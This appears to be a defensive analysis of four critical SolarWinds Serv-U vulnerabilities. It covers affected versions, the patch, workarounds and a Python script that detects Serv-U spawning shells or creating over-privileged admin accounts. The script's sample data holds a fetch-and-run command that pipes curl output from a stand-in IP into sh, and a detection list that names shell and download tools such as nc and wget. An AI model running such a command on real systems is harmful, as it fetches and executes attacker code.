Full Report
SolarWinds has released updates to address four critical security flaws in its Serv-U file transfer software that, if successfully exploited, could result in remote code execution. The vulnerabilities, all rated 9.1 on the CVSS scoring system, are listed below - CVE-2025-40538 - A broken access control vulnerability that allows an attacker to create a system admin user and execute arbitrary
Analysis Summary
# Vulnerability: Four Critical RCE Vulnerabilities in SolarWinds Serv-U
## CVE Details
- CVE ID: CVE-2025-40538, CVE-2025-40539, CVE-2025-40540, CVE-2025-40541
- CVSS Score: 9.1 (Critical)
- CWE: No CWE identifiers are given in the excerpt. Inferred classes from the descriptions: broken access control (CVE-2025-40538), type confusion (CVE-2025-40539, CVE-2025-40540), insecure direct object reference (CVE-2025-40541).
## Affected Systems
- Products: SolarWinds Serv-U file transfer software
- Versions: Version 15.5 (builds prior to the fixed release, 15.5.4)
- Configurations: Exploitation requires an existing Serv-U administrative role. The root-level impact applies where the Serv-U service itself runs as root; SolarWinds rates the risk as medium on Windows deployments because the service commonly runs under a less-privileged account by default.
## Vulnerability Description
Four separate critical vulnerabilities exist in SolarWinds Serv-U:
1. **CVE-2025-40538 (Broken Access Control):** An attacker who already holds Serv-U domain admin or group admin privileges can create a system administrator user and, from that position, execute arbitrary code as root.
2. **CVE-2025-40539 & CVE-2025-40540 (Type Confusion):** Two distinct type confusion flaws that permit an attacker to execute arbitrary native code as root.
3. **CVE-2025-40541 (Insecure Direct Object Reference - IDOR):** An IDOR vulnerability that allows an attacker to execute native code as root.
## Exploitation
- Status: Not reported as exploited in the wild (per vendor advisory), but prior Serv-U flaws have been exploited historically, so the patch should be treated as urgent.
- Privileges Required: An existing Serv-U administrative role (domain admin or group admin for CVE-2025-40538; administrative access for the others, per the vendor).
- Attack Vector: Likely Network. The vendor excerpt does not state the vector, but Serv-U's administrative interface is network-reachable, and previous Serv-U flaws were remotely exploitable.
## Impact
- Confidentiality: Potentially High (Root code execution allows full system compromise)
- Integrity: Potentially High (Arbitrary code execution as root)
- Availability: Potentially High (Arbitrary code execution as root)
## Remediation
### Patches
- **SolarWinds Serv-U version 15.5.4** addresses all four vulnerabilities.
### Workarounds
- No specific workarounds were detailed in the provided context. Because every flaw requires an existing Serv-U administrative role, two compensating measures follow directly from the advisory: audit and minimise the set of accounts holding domain admin or group admin roles in Serv-U, and run the Serv-U service under a dedicated, non-root account so that code execution through these flaws does not land as root. Restricting network exposure of the Serv-U administrative interface to trusted management networks also reduces who can reach the vulnerable functionality.
## Detection
- Detection methods were not explicitly provided. Two behaviours follow from the vulnerability descriptions and are worth monitoring: creation of a Serv-U system administrator account by an account that holds only domain admin or group admin rights (the privilege boundary CVE-2025-40538 crosses), and the Serv-U service process spawning shells, script interpreters or download utilities, which a file transfer daemon has no reason to launch.
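The following is an added example, not code from SolarWinds or from the original report, showing how those two checks can be expressed as detection logic. The process events use Sysmon-style field names (Image, ParentImage, CommandLine, User); the audit lines use a constructed key=value layout that is not Serv-U's real log format, and the Serv-U binary names and install paths are assumptions to confirm against your own deployment.

```python
"""Two detections for the Serv-U flaws discussed above (added example).

1. find_suspicious_children: the Serv-U service spawning an interpreter or
   living-off-the-land binary (post-exploitation behaviour of any of the four CVEs).
2. find_privilege_escalations: a lower-tier Serv-U admin creating a higher-tier
   account (the boundary CVE-2025-40538 crosses).
"""
import re

# Assumed names of the Serv-U service binary on Windows and Linux (assumption;
# confirm against the actual install on your hosts).
SERVU_IMAGES = {"serv-u.exe", "serv-u"}

# Interpreters and LOLBins a file-transfer daemon should never launch.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "certutil.exe", "bitsadmin.exe",
    "sh", "bash", "dash", "python", "python3", "perl", "nc", "ncat", "curl", "wget",
}

# Serv-U privilege tiers, lowest to highest, as used in the vendor description.
ROLE_RANK = {"user": 0, "group_admin": 1, "domain_admin": 2, "system_admin": 3}

# Constructed process-creation events (Sysmon-style field names; paths assumed).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Serv-U\Serv-U.exe",
     "CommandLine": "cmd.exe /c whoami", "User": "NT AUTHORITY\\SYSTEM"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe", "User": "CORP\\alice"},
    {"Image": "/bin/sh",
     "ParentImage": "/opt/Serv-U/Serv-U",
     "CommandLine": "sh -c 'curl http://203.0.113.5/x | sh'", "User": "root"},
    {"Image": r"C:\Program Files\Serv-U\Serv-U-Tray.exe",
     "ParentImage": r"C:\Program Files\Serv-U\Serv-U.exe",
     "CommandLine": "Serv-U-Tray.exe", "User": "NT AUTHORITY\\SYSTEM"},
]

# Constructed audit lines in a hypothetical key=value layout (not Serv-U's format).
SAMPLE_AUDIT = """\
2025-06-01T10:00:00Z actor=ops.admin role=system_admin action=create_user target=backup1 target_role=user
2025-06-01T10:05:00Z actor=grp.lead role=group_admin action=create_user target=helper target_role=system_admin
2025-06-01T10:07:00Z actor=dom.admin role=domain_admin action=create_user target=svc2 target_role=domain_admin
2025-06-01T10:09:00Z actor=grp.lead role=group_admin action=delete_user target=old target_role=user
"""

AUDIT_RE = re.compile(
    r"^(?P<ts>\S+) actor=(?P<actor>\S+) role=(?P<role>\S+) action=(?P<action>\S+) "
    r"target=(?P<target>\S+) target_role=(?P<target_role>\S+)$"
)


def basename(path: str) -> str:
    """Lower-cased final component of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def find_suspicious_children(events):
    """Return process events where Serv-U spawned an interpreter or LOLBin."""
    return [
        ev for ev in events
        if basename(ev.get("ParentImage", "")) in SERVU_IMAGES
        and basename(ev.get("Image", "")) in SUSPICIOUS_CHILDREN
    ]


def find_privilege_escalations(audit_text: str):
    """Return create_user records where the created account outranks its creator.

    A domain or group admin creating a system admin is exactly the access-control
    failure described for CVE-2025-40538, so it is flagged regardless of allowlists.
    """
    hits = []
    for line in audit_text.splitlines():
        m = AUDIT_RE.match(line)
        if not m or m["action"] != "create_user":
            continue
        # Unknown roles rank lowest so a malformed role never hides an escalation.
        if ROLE_RANK.get(m["target_role"], 0) > ROLE_RANK.get(m["role"], 0):
            hits.append(m.groupdict())
    return hits


if __name__ == "__main__":
    for ev in find_suspicious_children(SAMPLE_EVENTS):
        print("SUSPICIOUS CHILD:", ev["ParentImage"], "->", ev["CommandLine"])
    for rec in find_privilege_escalations(SAMPLE_AUDIT):
        print("PRIVILEGE ESCALATION:", rec["actor"], rec["role"], "created",
              rec["target"], "as", rec["target_role"])
```

On the constructed input the first check fires twice (the Windows cmd.exe and the Linux /bin/sh children of Serv-U) and ignores the Serv-U tray helper, and the second check fires once, on the group admin creating a system admin. In production, feed the first function from your EDR or Sysmon process-creation stream and adapt the second to whatever audit source records Serv-U account administration.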
## References
- Vendor Advisory (CVE-2025-40538): hxxps://www.solarwinds.com/trust-center/security-advisories/cve-2025-40538
- Vendor Advisory (CVE-2025-40539): hxxps://www.solarwinds.com/trust-center/security-advisories/cve-2025-40539
- Vendor Advisory (CVE-2025-40540): hxxps://www.solarwinds.com/trust-center/security-advisories/cve-2025-40540
- Vendor Advisory (CVE-2025-40541): hxxps://www.solarwinds.com/trust-center/security-advisories/cve-2025-40541
- Release Notes: hxxps://documentation.solarwinds.com/en/success_center/servu/content/release_notes/servu_15-5-4_release_notes.htm